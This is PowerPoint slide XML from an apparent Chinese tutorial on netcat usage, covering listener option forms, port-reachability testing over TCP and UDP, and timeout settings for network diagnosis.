  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
    <p:bldLst>
      <p:bldP spid="6"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71395" y="627380"/>
            <a:ext cx="4514215" cy="437515"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>命令行选项的【合写】形式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" spc="450" dirty="0">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a:off x="3078741" y="1586539"/>
            <a:ext cx="4858866" cy="1495425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="文本框 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3173490" y="1664837"/>
            <a:ext cx="4727054" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:defRPr sz="1400" spc="80">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr indent="0" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" spc="600" dirty="0"/>
              <a:t>nc -lp 12345 -v</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" spc="600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" spc="600" dirty="0"/>
              <a:t>nc -l -v -p 12345</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" spc="600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" spc="600" dirty="0"/>
              <a:t>nc -lv -p 12345</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" spc="600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" spc="600" dirty="0"/>
              <a:t>nc -lvp 12345</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" spc="600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3078741" y="3435846"/>
            <a:ext cx="1998482" cy="1188132"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId1"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect l="-5647" t="-2267" r="-5647" b="-22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方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5131236" y="3435846"/>
            <a:ext cx="1998482" cy="1188132"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect l="-5647" t="-2267" r="-5647" b="-22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方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7209550" y="3435846"/>
            <a:ext cx="1166208" cy="1188132"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect l="-55260" t="-2267" r="-35462" b="-22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方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="489856" y="1586539"/>
            <a:ext cx="2358061" cy="3037439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect l="-10107" t="-3997" r="-142601" b="-1208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方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
    <p:bldLst>
      <p:bldP spid="2" grpId="0"/>
      <p:bldP spid="5" grpId="0" animBg="1"/>
      <p:bldP spid="6" grpId="0" animBg="1"/>
      <p:bldP spid="8" grpId="0" animBg="1"/>
      <p:bldP spid="9"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a:off x="0" y="0"/>
            <a:ext cx="6491153" cy="5143500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 8531131"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 3660868 w 8531131"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 8531131 w 8531131"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 3660868 w 8531131"/>
              <a:gd name="connsiteY3" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 853113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31131" h="6858000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3660868" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8531131" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3660868" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="685800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sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827518" y="1443877"/>
            <a:ext cx="3924435" cy="837565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>用法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="5000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="等腰三角形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899969" y="3076140"/>
            <a:ext cx="720080" cy="456479"/>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2" descr="C:\Users\Administrator\Desktop\51yuadddnsu.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13172"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3923928" y="159481"/>
            <a:ext cx="5271253" cy="4984019"/>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197768" y="159482"/>
            <a:ext cx="8748464" cy="4824536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="190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p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>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直角三角形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1273629"/>
            <a:ext cx="6836228" cy="3869871"/>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书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3610610" y="1305560"/>
            <a:ext cx="5105400" cy="3300095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr spc="600">
                <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr sz="1400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>导致监听端口【无法】连上，通常有两种原因：  </a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="1400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>其一，这个监听端口根本就【没开启】；  </a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="1400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>其二，监听端口虽然开启，但是被防火墙阻拦了。  </a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="1400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>　　对第 1 个原因，（如果你能在该主机上运行命令）可以直接用netstat这个命令查看监听端口是否开启。  </a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="1400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>　　但对于第 2 个原因，netstat就用不上了。这时候就可以用 nc 来帮你搞定</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>。</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矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="786130" y="446405"/>
            <a:ext cx="7358380" cy="868680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>招数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>：（网络诊断）测试某个远程主机的【监听】端口是否可达</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450"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Tree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
    <p:bldLst>
      <p:bldP spid="5"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24205" y="2941955"/>
            <a:ext cx="7895590" cy="1929765"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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内容占位符 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755650" y="3075305"/>
            <a:ext cx="7774305" cy="1673225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr spc="6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marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>通常情况下，要测试的端口都是 TCP 协议的端口；如果你碰到特殊情况，需要测试某个 UDP 的端口是否可达。nc 同样能胜任。只需要追加-u选项。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="624298" y="1260670"/>
            <a:ext cx="7895406" cy="1495425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="624297" y="1262031"/>
            <a:ext cx="1914585" cy="5921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2000" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="内容占位符 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="745233" y="1854211"/>
            <a:ext cx="7774471" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr spc="6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marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>如果你所处的网络环境稳定且高速（比如：局域网内），那么，你可以追加-w选项，设置一个比较小的超时值。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="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矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2695635" y="446207"/>
            <a:ext cx="3752730" cy="468630"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>用法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2915920" y="1370330"/>
            <a:ext cx="4329430" cy="375920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="2000" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nc -nv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -w 3</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> x.x.x.x xx</a:t>
            </a:r>
            <a:endParaRPr sz="2000" b="1" spc="450"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2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3060065" y="4443730"/>
            <a:ext cx="4329430" cy="375920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="2000" b="1" spc="450" dirty="0">
